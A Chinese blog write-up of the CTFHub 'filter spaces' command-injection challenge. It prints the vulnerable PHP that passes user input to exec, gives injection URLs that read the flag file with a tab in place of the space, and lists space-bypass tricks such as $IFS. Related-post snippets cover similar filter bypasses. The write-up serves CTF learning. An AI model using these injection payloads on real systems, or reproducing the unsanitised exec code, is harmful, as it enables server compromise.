CTFHub | 过滤空格

最新推荐文章于 2024-08-07 20:00:00 发布
最新推荐文章于 2024-08-07 20:00:00 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: CTF精进之路 文章标签: web安全 CTF php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/131316986
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

过滤空格:

        这次过滤了空格,你能绕过吗。

网页显示内容

         

        

0x02 解题过程

检查网页源代码发现这题如果有空格就不会执行,说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试,可以正常回显。

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/ /", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

        

在 URL 后加入管道符号,输入 ls 命令进行查看,同样发现一个 flag 可疑文件。

http://challenge-150707dae6f3ddfe.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls

        

在管道符后输入 cat flag 命令进行查看。因为这题过滤了空格,如果在 URL 中输入空格,则不会执行 ping 命令。那么这里将空格替换为 %09 ,也就是 ASCII 的 Tab 键。检查网页,同样是有传递无内容,检查网页源代码发现此题 flag 。

http://challenge-150707dae6f3ddfe.sandbox.ctfhub.com:10800/?ip=127.0.0.1|cat%09flag_5338166523061.php

        

        

0x03 常见绕过方法

        过滤空格指的是从一段文本中去除空格,即删除字符串中的空格字符。在 URL 中,我们输入的符号都会由 URL 编码进行转换输出,例如 %20 在 URL 中就代表空格的意思。

        

名称介绍
<表示输入重定向,可以将文件或命令的输出作为输入传递给另一个命令。
<>表示输入输出的重定向。可以将文件或命令的输出作为输入传递给另一个命令,并将输出重定向到另一个文件。
%09在 URL 中表示制表符。
%20在 URL 中表示空格。
$IFS直接使用 $IFS 变量表示空格。
\${IFS}与 $IFS 变量一致,添加了反斜杠以及大括号。

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Js过滤空格的实现代码
10-27
在JavaScript中,过滤空格是一项常见的任务,尤其是在处理用户输入或者格式化文本时。通过JavaScript进行空格过滤,我们可以减少服务器的负担,因为这可以在客户端完成,而不必等待数据发送到服务器并返回处理结果。...
过滤空格ctfhub
2401_82985722的博客
04-02 464
注释过滤 /**/、/*!*/、//、#、--括号过滤 ()符号过滤 %00、%09、%20、%a0 %0a、%0b、%0c、%0d引号过滤 ' 、 "大小写过滤 大小写双关键字绕过 '+'正则表达式绕过 \s、\s*\s+ 表示匹配一个或多个空白字符,\s* 表示匹配零个或多个空白字符。
CTFhub-RCE-过滤空格
ssss39的博客
11-16 399
IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。< 、>、、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等。2. 查看 flag_890277429145.php。1. 查看当前目录:127.0.0.1|ls。
CTFHUB-web-RCE-过滤空格
最新发布
weixin_68416970的博客
08-07 147
因为这题过滤空格,如果在 URL 中输入空格,则不会执行 ping 命令。那么这里将空格替换为 %09 ,也就是 ASCII 的 Tab 键。右键检查网页源代码发现了 flag。在 URL 后面拼接使用管道符执行注入,发现了 flag 的可疑文件。
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8736
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
CTFhub】命令注入—过滤空格
manerzi的博客
10-25 679
CTFhub】命令注入—过滤空格
CTFHUB-过滤空格
Web学习之路
03-28 281
替换
CTFHub笔记之技能树 WEB过滤空格
weixin_48799157的博客
03-21 2329
小白一个,如果错误请指正! 首先我们常规的去注入一下,发现之前使用的句子行不通,原因是空格键被过滤掉了。 那我们就得去学习一下怎么绕过空格过滤: SQL注入绕过技巧 - VVVinson - 博客园1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方https://www.cnblogs.com/Vinson404/p...
javascript用正则表达式过滤空格的实现代码
10-22
JavaScript中使用正则表达式过滤字符串中的空格是处理文本数据时的常见需求。正则表达式提供了一种强大的方式,可以根据特定模式来匹配和操作字符串中的内容。在本文中,我们将会探讨如何利用JavaScript中的正则...
一个js过滤空格的小函数
10-25
标题中的"一个js过滤空格的小函数"指的是在JavaScript中编写的一个简单函数,用于移除字符串中的空格。这个功能在某些场景下非常有用,比如在用户注册页面,可以防止用户输入带有空格的用户名或密码,从而减轻服务器...
js过滤空格代码
10-10
过滤空格代码
2047:例5.16过滤空格.cpp
02-18
2047:【例5.16】过滤空格 时间限制: 1000 ms 内存限制: 65536 KB 提交数: 23949 通过数: 15169 【题目描述】 过滤多余的空格。一个句子中也许有多个连续空格过滤掉多余的空格,只留下一个空格。 【输入】 一行...
CTFhub(eval执行,无过滤过滤cat,过滤空格过滤运算符)
ndjnddjxn的博客
04-02 802
未发现什么,返回上一级目录?
CTFHub技能树web(持续更新)--RCE--命令注入--综合过滤练习
jiuyongpinyin的博客
01-27 2282
综合过滤练习 这道题试了好多种方法,最后才发现需要在url里面改才可以,也是参考了大佬的链接 我是大佬链接 这道题能过滤的基本都过滤了,我们第一步应该想办法查看当前文件夹的内容,这里常用的管道符都不能用,只能用换行符的url编码 %0a,并且去要在url中修改: ?ip=127.0.0.1%0als# 看到了回显就看到了希望,接下来要进入到flag这个文件夹中来查看该文件夹的内容,这里flag被过滤了,又学到了一个新的知识点TAB的url编码,我们用这个把文件夹的名字补全: ?ip=127.0.0.
CTFHub——XSS
2302_79119987的博客
03-28 1172
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 1064
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CyberCTF 4道MISC
A_dmin的博客
07-09 610
CyberCTF 4道MISC 一天一道CTF题目,能多不能少 虽然说今天课设,但是CTF还是要打的, 就说一下做对的misc解题思路吧 最后一道MISC只有一点点头绪,但是做不出来。。。。。 第一道MISC Sign in 签到题,没什么好说的,下载文件打开: 直接扫描条形码就得到了flag~ 第二道MISC No Word 下载文件,直接打开是一个空白文件。。。。。 其实里面有东西的, 说...
CTF 代码审计之绕过过滤的空白字符
天泽岁月
08-31 988
ctf空白字符
CTFHub 过滤空格
06-12
CTFHub 是一个网络安全技术社区和平台,它可能提供各种挑战(Challenge)和资源,包括渗透测试、夺旗赛(Capture the Flag, CTF)题目等。在使用 CTFHub 时,"过滤空格"通常指的是在输入或输出数据处理过程中,去除字符串中的多余空白字符,比如空格、制表符或换行符,以便正确解析或展示给用户。这在编程中常见于数据格式化、字符串操作或者接收用户输入时。 例如,在处理用户提交的代码片段或字符串谜题答案时,服务器可能需要将所有空格去掉,以确保程序的预期行为不因为输入格式的变化而受影响。这样做的目的是为了提高代码执行的准确性和一致性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值